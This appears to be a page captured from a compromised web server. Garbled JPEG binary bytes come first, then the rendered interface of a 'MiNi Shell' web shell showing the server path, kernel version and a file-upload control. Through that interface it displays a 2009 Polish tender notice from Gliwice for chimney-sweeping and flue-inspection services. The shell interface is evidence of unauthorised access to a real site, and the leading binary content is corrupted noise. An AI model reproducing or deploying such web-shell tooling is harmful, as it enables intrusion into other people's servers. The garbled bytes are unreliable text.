JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/44257-N-2009.html

<p class="kh_header"><b>Gliwice: wykonanie usług kominiarskich wraz z przeprowadzeniem  okresowej kontroli stanu technicznej sprawności  przewodów  kominowych w budynkach stanowiących własność Miasta Gliwice  oraz TBS  administrowanych przez  ZBM I TBS  Sp. z o.o. w Gliwicach.</b><br>
<b>Numer ogłoszenia: 44257 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o , ul. Dolnych Wałów 11, 44-100 Gliwice, woj. śląskie, tel. 032 3392900, faks 032 3392962.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbm.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie usług kominiarskich wraz z przeprowadzeniem  okresowej kontroli stanu technicznej sprawności  przewodów  kominowych w budynkach stanowiących własność Miasta Gliwice  oraz TBS  administrowanych przez  ZBM I TBS  Sp. z o.o. w Gliwicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wykonanie usług kominiarskich wraz z przeprowadzeniem  okresowej kontroli stanu technicznej sprawności  przewodów  kominowych w budynkach stanowiących własność Miasta Gliwice  oraz TBS  administrowanych przez  ZBM I TBS  Sp. z o.o. w Gliwicach.  


1. Zakres zamówienia obejmuje: 
1.1.Wszelkie usługi kominiarskie o charakterze obowiązkowym w budynkach administrowanych przez Zamawiającego wg wykazu adresowego zał. nr 7 wynikające z:
Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 r.  (Dz. U, Nr 80, poz. 563) w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów w zakresie czyszczenia przewodów kominowych wg harmonogramu:
-  czyszczenie przewodów dymowych - 4 razy w roku
-  czyszczenie przewodów spalinowych wraz z nasadami kominowymi - 2 razy w roku
-  czyszczenie przewodów wentylacyjnych - 1 raz w roku.
Przez czyszczenie przewodu kominowego rozumie się czyszczenie przewodu na całej długości wraz z głowicą.
W zakresie prac obowiązkowych mieści się czynność usunięcia sadzy i popiołu 
z wyniesieniem na zewnątrz budynku.
1.2. Usługi dodatkowe na odrębne zlecenie Zamawiającego m.in. sprawdzanie stanu technicznego przewodów kominowych w stanie surowym i użytkowym oraz przed i po kapitalnym remoncie, wskazywanie przewodów do podłączenia wszelkiego rodzaju urządzeń grzewczych i wentylacyjnych, przeprowadzenie inwentaryzacji urządzeń grzewczo- kominowych, ustalanie przyczyn wadliwego działania urządzeń grzewczo - kominowych z wydaniem opinii zawierających wskazanie rozwiązań technicznych likwidujących usterki, wyszukiwanie i określenie miejsca nieszczelności w przewodzie kominowym, odgruzowanie przewodów itp.
2.Zakres zamówienia obejmuje:
2.1.Sprawdzenie stanu technicznej sprawności przewodów kominowych (dymowych, spalinowych, wentylacyjnych)
-  Zakres  badania technicznego  kontroli  przewodów  kominowych  odbywać się będzie zgodnie przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. z 2006r., Nr 156, poz. 1118 z późniejszymi zmianami). Sprawdzenie stanu technicznej sprawności przewodów kominowych odbywać się będzie zgodnie z instrukcją ustanowioną przez Prezydium Zarządu Głównego Korporacji Kominiarzy Polskich uchwałą z dnia    8 września 1994 r. w sprawie realizowania przez  kompetentne służby kominiarskie założeń wynikających z art. 62 ustawy z dnia 7 lipca  1994r. Prawo budowlane.
2.2 Dokonanie kontroli przewodów kominowych w budynkach na: 
ROM-1,2,3,5,7,8,9 wg wykazu adresowego - załącznik nr 7. Wykonawca zobowiązany jest w trakcie kontroli uzupełniać harmonogram, zgodnie z zapisami umowy.

3. Sporządzenie protokołów z przeprowadzonej kontroli przewodów kominowych wraz uwagami i zaleceniami pokontrolnymi dla każdego budynku.

4. Współpraca z kierownikami ROM-ów w zakresie m.in. ustalania harmonogramów kontroli..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WADIUM:
1. Oferta musi być zabezpieczona wadium w wysokości: 4 500,00 zł do godz:09:00.
2. Wadium należy wnieść w terminie do dnia 12-03-2009r., z uwzględnieniem   skutecznego złożenia oferty przetargowej.  
3. Wadium trzeba wnieść w formie
a: pieniądza:
jedynie przelewem na rachunek bankowy  Zamawiającego : ING. Bank Śląski S.A. 
I oddział w Gliwicach 20 1050 1285 1000 0022 2649 4546   Potwierdzenie (kopię przelewu) należy przedłożyć w składanej ofercie pod rygorem odrzucenia.
4. Zamawiający zwraca niezwłocznie wadium jeżeli:
a: upłynął termin związania ofertą;
b: zawarto umowę w sprawie  zamówienia publicznego i wniesiono zabezpieczenie 
    należytego wykonania tej umowy;
c: Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia;
5. Z zastrzeżeniem art.4a, Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
  -który wycofał ofertę przed upływem terminu składania ofert;
  - który został wykluczony z postępowania;
  - którego oferta została  odrzucona.
6. Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ust.2 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
a: Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
c: Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
7. Zamawiający zatrzymuje wadium  wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
  a: odmówił podpisania umowy w sprawie zamówienia  publicznego na warunkach 
      określonych w ofercie;
  b: nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
  c: zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych  (tekst jedn:. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych. 
Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki i potwierdzić ich spełnienie wskazanymi dokumentami:
1.Oświadczenie, że oferent spełnia warunki określone w  art. 22.1 ustawy PZP o uprawnieniu do udzielania zamówienia.
2. Oświadczenie, że oferent spełnia warunki określone w art.24 ustawy PZP  i nie podlega wykluczeniu.
3. Wykaz osób i podmiotów wykonujących zamówienie. Informacja ogólna na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego w ciągu ostatnich 3 lat, oraz  wykaz osób odpowiedzialnych za realizację zamówienia (kadra kierownicza i  techniczna) wraz z danymi na temat ich kwalifikacji - informację należy sporządzić  wg wzoru dołączonego do niniejszego SIWZ.
4. Oświadczenie o zgodności z warunkami przetargu.
Ocena spełniania powyższych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na podstawie załączonych do oferty dokumentów i oświadczeń. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy  udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Formularz ofertowy - według oryginalnego druku zamawiającego (załącznik do niniejszych SIWZ). Cenę ofertową należy podać w jednostkach pieniężnych obowiązujących w Polsce tj. złotych polskich, z zaokrągleniem do drugiego miejsca po przecinku.
2.Dowód wniesienia wadium (potwierdzenie przelewu ) potwierdzający wniesienie wadium w wymaganym terminie oraz wymaganej wysokości.	
3.Wzór umowy-Zaparafowany wzór umowy (wszystkie strony) . Wzór umowy stanowi załącznik do niniejszych SIWZ.	
4.Wpis do ewidencji działalności gospodarczej/ odpis z KRS. Aktualny odpis z właściwego rejestru sądowego względnie  zaświadczenie  o wpisie do ewidencji działalności gospodarczej, potwierdzające prowadzenie działalności o profilu pozwalającym zrealizować zamówienie wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Zamawiający dopuszcza dokument wystawiony z wcześniejszą datą pod warunkiem, że zostanie on poświadczony przez organ wydający (za zgodność z oryginałem) i będzie miał jego adnotację o aktualności danych na dzień poświadczenia (data poświadczenia - jak wyżej). W przypadku Spółek z o.o. ,  do odpisu KRS należy dołączyć oświadczenie Zarządu spółki stosownie do art. 230 Kodeksu spółek handlowych, a w przypadku S.C załączyć umowę oraz stosowne upoważnienie.
Upoważnienia winny posiadać dowód opłaty w wysokości obowiązującej na dzień złożenia oferty.	
5.Informacja z Krajowego Rejestru Karnego - Członków Zarządu (Art.24 ust.1 pkt.4,5,6,7,8)Aktualna informacja z Krajowego Rejestru Karnego w zakresie  określonym w art.24 ust.1 pkt. 4,5,6,7,8 Ustawy Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert.	
6.Informacja z Krajowego Rejestru Karnego -o podmiocie zbiorowym (art. 24 ust.1 pkt.9)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1pkt.9 Ustawy prawo Zamówień Publicznych, wystawiona  nie wcześniej niż 6 miesięcy przed terminem składania ofert.
7.Zaświadczenie  o braku zaległości  w opłacaniu podatków US -Aktualne zaświadczenie właściwego   naczelnika urzędu skarbowego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków - wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert.	
8.Zaświadczenie o braku zaległości - ZUS-Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne - wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert.
9.Uprawnienia zawodowe osób uczestniczących w realizacji zamówienia (załączyć kserokopie).Usługi kominiarskie oraz kontrolę przewodów kominowych muszą przeprowadzać wyłącznie osoby legitymujące się dyplomem mistrza kominiarskiego. 10.Wykaz ważniejszych zamówień  zrealizowanych w ciągu ostatnich 3 lat, zbliżonych do przedmiotu zamówienia co do zakresu, charakteru i złożoności   oraz wartości objętych niniejszym zamówieniem.Oferent musi wykazać zrealizowanie - jako główny wykonawca co najmniej 3 -ch zamówień o podobnym charakterze i złożoności porównywalnej z przedmiotem zamówienia (usługi kominiarskie 
oraz   okresowe przeglądy technicznej sprawności przewodów kominowych)
W  przypadku wskazania podwykonawców, ich dokumenty potwierdzające wykonanie robót, będą uznane w zakresie jaki będą wykonywać. Druk stanowi załącznik do niniejszego SIWZ	
11.Dokumenty potwierdzające wykonanie robót	-Dokumenty potwierdzające, że usługi wymienione w wykazie jw. zostały wykonane z należytą starannością. Dokumenty te  powinny zawierać dane zawarte w wykazie zrealizowanych zamówień, o którym mowa w punkcie j.w.	
12.Ubezpieczenie-Polisa lub inny dokument ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (załączyć dowód opłaty składki).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zbm1tbs.gliwice.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gliwice, ul. Zwycięstwa 13, IIIp. Sekcja Zamówień Publicznych, pok.324.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 09:00, miejsce: Gliwice, ul. Zwycięstwa 13, IIIp. Sekcja Zamówień Publicznych, pok.324.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com